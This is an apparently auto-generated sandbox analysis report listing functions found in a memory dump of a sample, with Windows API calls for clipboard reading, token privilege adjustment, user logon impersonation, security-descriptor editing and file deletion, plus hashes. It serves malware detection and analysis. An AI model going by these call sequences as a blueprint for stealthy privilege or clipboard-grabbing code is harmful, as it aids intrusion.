                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ClearVariant
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 1473721057-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: f92c959493914d00e52e6a6e9994a39c64679280ec88806a534dd01adc521018
                                                                                                                                                                                                                                                                                                    • Instruction ID: dd0c2ff1f6f6e815937b26536551e9e9414975b65e6ad25795e2f3babe1ea019
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f92c959493914d00e52e6a6e9994a39c64679280ec88806a534dd01adc521018
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 83F0EDB1704601AAE7208BA8A809BA1FBF8BB21314F14462EE4D582181D7B254D497A2
                                                                                                                                                                                                                                                                                                    Function 00A1684A Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: __fread_nolock
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2638373210-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
                                                                                                                                                                                                                                                                                                    • Instruction ID: 729145ea618b69a07172406a5a97b8479165a50d5097fbed13df220b1c478b92
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B9F0D47550020DFBDF05DF90C941A9E7B79FB08318F208445F9159A151C336EA61ABA1
                                                                                                                                                                                                                                                                                                    Function 00A13907 Relevance: 1.5, APIs: 1, Instructions: 24windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • Shell_NotifyIconW.SHELL32(00000002,?), ref: 00A13963
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: IconNotifyShell_
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 1144537725-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 3d43c2b6fca83d09f17592c48e35d078abc120aa56205f482efb8b87c53da69a
                                                                                                                                                                                                                                                                                                    • Instruction ID: ac13d5bfb050f70c590196995c878a3663d1ac698bada1c2da9433ad4ec6b46a
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3d43c2b6fca83d09f17592c48e35d078abc120aa56205f482efb8b87c53da69a
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D9F0A7709043499FEB52DF64DC467D57BBCA70170CF0000A5A2849A181D7744789CF41
                                                                                                                                                                                                                                                                                                    Function 00A13A57 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00A13A76
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A18577: _wcslen.LIBCMT ref: 00A1858A
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: LongNamePath_wcslen
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 541455249-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 7774473de274407c99a8f2774c8567faab1da667b28a88f86ad9782b184c6a63
                                                                                                                                                                                                                                                                                                    • Instruction ID: 019858e5e868a449113b39d027c7dfeeed58fbb45134819bc082fc4abecdd278
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7774473de274407c99a8f2774c8567faab1da667b28a88f86ad9782b184c6a63
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0CE08C76A002245BCB20A2989C06FEA77ADEBC97A0F4440B1BC49D7258EA64AD858690
                                                                                                                                                                                                                                                                                                    Function 00A5071A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32(00000000,00000000,?,00A50A84,?,?,00000000,?,00A50A84,00000000,0000000C), ref: 00A50737
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CreateFile
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 823142352-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: a097a3eee33874a520820bfb45665384ecc8160ccd482de2678c458659b040ee
                                                                                                                                                                                                                                                                                                    • Instruction ID: 7ba372ea2713c3248ce00e4ad6d86ee14a75d7cd0725973ce07d4fec6a75d438
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a097a3eee33874a520820bfb45665384ecc8160ccd482de2678c458659b040ee
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 62D06C3210010DBBDF028F84DD06EDA3BAAFB48714F014100BE5856060C736E822AB90
                                                                                                                                                                                                                                                                                                    Function 00A7EAB0 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetFileAttributesW.KERNEL32(?,00A7D840), ref: 00A7EAB1
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: AttributesFile
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3188754299-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: c894514320a8460ebe4dc595201871a3580bc4e46820ae69f68e715d995f9af0
                                                                                                                                                                                                                                                                                                    • Instruction ID: 8f81cbf8c60c7eda15027772077c2effee492378f457d1c82b0c8579a82df906
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c894514320a8460ebe4dc595201871a3580bc4e46820ae69f68e715d995f9af0
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BCB0923580060005AD288B385E09AD9330078473E67DC9BC0E4BE854F1D3398C0FE950
                                                                                                                                                                                                                                                                                                    Function 00A8664C Relevance: 1.3, APIs: 1, Instructions: 31COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A7DC54: FindFirstFileW.KERNEL32(?,?), ref: 00A7DCCB
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A7DC54: DeleteFileW.KERNEL32(?,?,?,?), ref: 00A7DD1B
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A7DC54: FindNextFileW.KERNELBASE(00000000,00000010), ref: 00A7DD2C
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A7DC54: FindClose.KERNEL32(00000000), ref: 00A7DD43
                                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00A8666E
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: FileFind$CloseDeleteErrorFirstLastNext
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2191629493-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 12ca6b927f9e2c179680bcfb1b0b453e4e9f28138c9efdbd2ddf2be235d8d40e
                                                                                                                                                                                                                                                                                                    • Instruction ID: 303d92a76fb6f23bbce423bb8a072617831219c406a3fc236fccf22231b449c8
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 12ca6b927f9e2c179680bcfb1b0b453e4e9f28138c9efdbd2ddf2be235d8d40e
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: ADF0A0362042008FDB14EF58D945BAEBBE5AF88360F048419F94A8B392CB74FC42CB90

                                                                                                                                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                                                                                                                                    Function 00A71B4D Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 241COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A72010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00A7205A
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A72010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00A72087
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A72010: GetLastError.KERNEL32 ref: 00A72097
                                                                                                                                                                                                                                                                                                    • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00A71BD2
                                                                                                                                                                                                                                                                                                    • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 00A71BF4
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00A71C05
                                                                                                                                                                                                                                                                                                    • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00A71C1D
                                                                                                                                                                                                                                                                                                    • GetProcessWindowStation.USER32 ref: 00A71C36
                                                                                                                                                                                                                                                                                                    • SetProcessWindowStation.USER32(00000000), ref: 00A71C40
                                                                                                                                                                                                                                                                                                    • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00A71C5C
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A71A0B: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00A71B48), ref: 00A71A20
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A71A0B: CloseHandle.KERNEL32(?,?,00A71B48), ref: 00A71A35
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                                                                                                                                                                                                                                                                                    • String ID: $default$winsta0
                                                                                                                                                                                                                                                                                                    • API String ID: 22674027-1027155976
                                                                                                                                                                                                                                                                                                    • Opcode ID: 8a3c31283f0746403c9b969162f983f9148b16b0f5e4f78d23ae07bfaa96a212
                                                                                                                                                                                                                                                                                                    • Instruction ID: 2cc7a21663a857cae48597cbcd7d94028d36cc334305269694ee6de1e108fcf5
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8a3c31283f0746403c9b969162f983f9148b16b0f5e4f78d23ae07bfaa96a212
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E4816A71900209ABDF21DFA8DD49FEE7BB8EF05301F148129F959A61A1E7318A46CB60
                                                                                                                                                                                                                                                                                                    Function 00A714AE Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A71A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00A71A60
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A71A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,00A714E7,?,?,?), ref: 00A71A6C
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A71A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00A714E7,?,?,?), ref: 00A71A7B
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A71A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00A714E7,?,?,?), ref: 00A71A82
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A71A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00A71A99
                                                                                                                                                                                                                                                                                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00A71518
                                                                                                                                                                                                                                                                                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00A7154C
                                                                                                                                                                                                                                                                                                    • GetLengthSid.ADVAPI32(?), ref: 00A71563
                                                                                                                                                                                                                                                                                                    • GetAce.ADVAPI32(?,00000000,?), ref: 00A7159D
                                                                                                                                                                                                                                                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00A715B9
                                                                                                                                                                                                                                                                                                    • GetLengthSid.ADVAPI32(?), ref: 00A715D0
                                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00A715D8
                                                                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 00A715DF
                                                                                                                                                                                                                                                                                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00A71600
                                                                                                                                                                                                                                                                                                    • CopySid.ADVAPI32(00000000), ref: 00A71607
                                                                                                                                                                                                                                                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00A71636
                                                                                                                                                                                                                                                                                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00A71658
                                                                                                                                                                                                                                                                                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00A7166A
                                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00A71691
                                                                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 00A71698
                                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00A716A1
                                                                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 00A716A8
                                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00A716B1
                                                                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 00A716B8
                                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00A716C4
                                                                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 00A716CB
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A71ADF: GetProcessHeap.KERNEL32(00000008,00A714FD,?,00000000,?,00A714FD,?), ref: 00A71AED
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A71ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,00A714FD,?), ref: 00A71AF4
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A71ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00A714FD,?), ref: 00A71B03
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 4175595110-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 1d932d178ba199818f711afc05d4790b415ca0eb7aacaffb31a7aa626c810203
                                                                                                                                                                                                                                                                                                    • Instruction ID: 3058800c141d2015dcf32b68b439a5226708ca109f08feddb4aa1e690484c2aa
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1d932d178ba199818f711afc05d4790b415ca0eb7aacaffb31a7aa626c810203
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A9714CB290020AABDF10DFA9DC44FAEBBF9BF05741F18C515E95AA6190D731D906CBA0
                                                                                                                                                                                                                                                                                                    Function 00A8F55C Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • OpenClipboard.USER32(00AADCD0), ref: 00A8F586
                                                                                                                                                                                                                                                                                                    • IsClipboardFormatAvailable.USER32(0000000D), ref: 00A8F594
                                                                                                                                                                                                                                                                                                    • GetClipboardData.USER32(0000000D), ref: 00A8F5A0
                                                                                                                                                                                                                                                                                                    • CloseClipboard.USER32 ref: 00A8F5AC
                                                                                                                                                                                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00A8F5E4
                                                                                                                                                                                                                                                                                                    • CloseClipboard.USER32 ref: 00A8F5EE
                                                                                                                                                                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00A8F619
                                                                                                                                                                                                                                                                                                    • IsClipboardFormatAvailable.USER32(00000001), ref: 00A8F626
                                                                                                                                                                                                                                                                                                    • GetClipboardData.USER32(00000001), ref: 00A8F62E
                                                                                                                                                                                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00A8F63F
                                                                                                                                                                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00A8F67F
                                                                                                                                                                                                                                                                                                    • IsClipboardFormatAvailable.USER32(0000000F), ref: 00A8F695
                                                                                                                                                                                                                                                                                                    • GetClipboardData.USER32(0000000F), ref: 00A8F6A1
                                                                                                                                                                                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00A8F6B2
                                                                                                                                                                                                                                                                                                    • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 00A8F6D4
                                                                                                                                                                                                                                                                                                    • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00A8F6F1
                                                                                                                                                                                                                                                                                                    • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00A8F72F
                                                                                                                                                                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00A8F750
                                                                                                                                                                                                                                                                                                    • CountClipboardFormats.USER32 ref: 00A8F771
                                                                                                                                                                                                                                                                                                    • CloseClipboard.USER32 ref: 00A8F7B6
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 420908878-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 87b24628c141c1f00d7e2e566c4ff47ae82a2e9e03115747601e1a82b474abfe
                                                                                                                                                                                                                                                                                                    • Instruction ID: 5188d9c2009e718fdf78180fcbf62a58e80c8942d0a56bae0519e36c03e41c42
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 87b24628c141c1f00d7e2e566c4ff47ae82a2e9e03115747601e1a82b474abfe
